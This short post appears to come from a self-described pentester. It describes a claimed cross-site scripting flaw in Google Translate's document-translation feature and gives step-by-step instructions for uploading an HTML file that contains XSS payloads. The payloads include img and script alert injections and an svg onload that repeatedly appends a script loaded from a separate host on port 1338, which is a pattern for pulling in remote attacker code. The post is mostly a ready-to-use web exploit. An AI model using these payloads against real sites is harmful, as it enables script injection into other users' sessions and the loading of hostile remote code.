[+] ~ J0nshu4w - Security Research and pentester. [+] [*] I'm a security researcher and found a sandbox fails, it consists of Cross Site Scripting, where can I send alerts, inject eval code, text, images, using the TAG <img>. [!] Testing in Windows / Linux / MacOS: Firefox, Chrome and Opera. [!] Ok Go! [!] To explore it open Google Translate [*] https://translate.google.com.br or [*] https://translate.google.com [!] After just below you have the option: [!] "Translate Document" [*] In this parameter we will inject XSS. [*] Create a .html file, .htm. [*] And in it we will by malicious code [XSS] with the TAG <img>. [+] My exploit for example: [+] ###################### <Img src = "http://i793.photobucket.com/albums/yy213/gilbef/GIFBRAZIOL.gif" onload = "alert (" xss by j0nshu4w ")"> </ img> <Marquee> <h1> xss is vuln by j0nshu4w </ h1> </ marquee> <Script> alert (document.domain) </ script>     <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)> #################### [*] After you have saved, select the file there in document translation options and click translate. [#] After this XSS successfully :D [#] DEMO: http://imgur.com/a/XLzd4 ###################### Made In Brazil 1337 [+] ~ J0nshu4w - Security Research and pentester. [+] Facebook: /jonatasfil Github: /ninj4c0d3r Youtube: /c/jonatasfil